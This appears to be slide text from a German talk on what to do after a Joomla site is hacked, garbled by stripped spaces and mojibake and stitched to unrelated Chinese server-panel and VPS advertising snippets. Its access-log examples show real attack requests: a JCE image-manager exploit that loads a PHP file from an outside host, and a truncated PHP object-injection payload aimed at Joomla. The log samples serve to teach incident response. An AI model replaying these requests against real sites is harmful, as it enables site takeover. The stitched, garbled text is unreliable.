MickieQuick-https://www.
flickr.
com/photos/mickie/1174280743Joomla!
wurdegehackt!
WasmussichtunbermichChristianSchmidt32JahreJoomla!
UserGroupMünchen-GründerJoomla-Security.
de-GründerThemenArtenvonHacksVorgehensweiseHackfindenundbehebenZukünftigeAngriffeabwehrenOffeneFragenundAntwortrundeArtenvonHacksEirikSolheim-https://www.
flickr.
com/photos/eirikso/2217292002/UnzhligvieleArten:DDoS,RemoteCodeExecution,CrossSiteRequestForgrery,SocialEngineering,DNSCachePoisoning,Session&AuthenticationAttack,CrossSiteScripting,Defacemand,Injection,usw.
VorgehensweiseGrundstzlicheAnleitung:1.
WebsitevomNetznehmen2.
EinbruchuntersuchenundLückefinden3.
PasswrterndernundBackupwiederherstellen4.
Lückenschlieen,Seitewiederfreigeben5.
WebsitegegenAngriffeabsichernhttps://www.
joomla-security.
de/joomla-gehackt-was-tun.
htmlHackfindenundbehebenHackfindenundbehebenHackfindenundbehebenHackfindenundbeheben157.
55.
34.
x--[05/Jan/2014:20:15:03+0100]"GET/de/component/search/searchword=heizger\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xc2\xa0\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\xa2\xe2\x80\x9e\xc2\xa2\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\x82\xc2\xa0\xc3\x83\xc6\x92\xc3\x82\xc2\xa2\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xbe\xc3\x82\xc2\xa2\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\xa2\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xe2\x80\xa6\xc3\x82\xc2\xa1\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\x85\xc2\xa1\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xa4teHTTP/1.
1"20081111www.
xxx.
de"-""Mozilla/5.
0(compatible;bingbot/2.
0;+http://www.
bing.
com/bingbot.
htm)""-"194.
150.
113.
x--[05/Jan/2014:21:00:40+0100]"GET/en/option=com_content&view=article&id=366&Itemid=452&sa=U&ei=kK3JUsWPE86T0QXKxYB4&ved=0CJkBEBYwGA&usg=AFQjCNHlFOPR682oWJYyC48XF93qq2HLtQ//index.
phpoption=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20src=http://ventaspor.
com/wp-includes/php/update.
phpHTTP/1.
1"20079814www.
xxx.
de"-""Mozilla/5.
0(WindowsNT5.
1)AppleWebKit/537.
22(KHTML,likeGecko)Chrome/25.
0.
1364.
160Safari/537.
22""-"95.
163.
75.
x--[05/Jan/2014:21:04:32+0100]"GET/administrator/index.
phpHTTP/1.
0"2004437xxx.
net"-""Opera/9.
80(WindowsNT6.
1;U;ru)Presto/2.
8.
131Version/11.
10""-"95.
163.
75.
x--[05/Jan/2014:21:04:33+0100]"POST/administrator/index.
phpHTTP/1.
0"200125xxx.
net"http://xxx.
net/administrator/index.
php""Opera/9.
80(WindowsNT6.
1;U;ru)Presto/2.
8.
131Version/11.
10""-"74.
3.
170.
33/CAN/Alberta74.
3.
170.
33––[12/Dec/2015:16:49:40-0500]"GET/contact/HTTP/1.
1"4035322"http://google.
com/""}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:.
.
{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.
.
现在宝塔面板真的是越来越过分了,删除文件、删除数据库、删除站点等操作都需要做计算题!我今天升级到7.7版本,发现删除数据库竟然还加了几秒的延时等待,也无法跳过!宝塔的老板该不会是小学数学老师吧,那么喜欢让我们做计算题!因此我写了个js用于去除各种计算题以及延时等待,同时还去除了软件列表页面的bt企业版广告。只需要执行以下命令即可一键完成!复制以下命令在SSH界面执行:Layout_file="/w...
rangcloud怎么样?rangcloud是去年年初开办的国人商家,RangCloud是一家以销售NAT起步,后续逐渐开始拓展到VPS及云主机业务,目前有中国香港、美国西雅图、韩国NAT、广州移动、江门移动、镇江BGP、山东联通、山东BGP等机房。目前,RangCloud提供香港CN2线路云服务器,电信走CN2、联通移动直连,云主机采用PCle固态硬盘,19.8元/月起,支持建站使用;美国高防云...
ftlcloud(超云)目前正在搞暑假促销,美国圣何塞数据中心的云服务器低至9元/月,系统盘与数据盘分离,支持Windows和Linux,免费防御CC攻击,自带10Gbps的DDoS防御。FTL-超云服务器的主要特色:稳定、安全、弹性、高性能的云端计算服务,快速部署,并且可根据业务需要扩展计算能力,按需付费,节约成本,提高资源的有效利用率。活动地址:https://www.ftlcloud.com...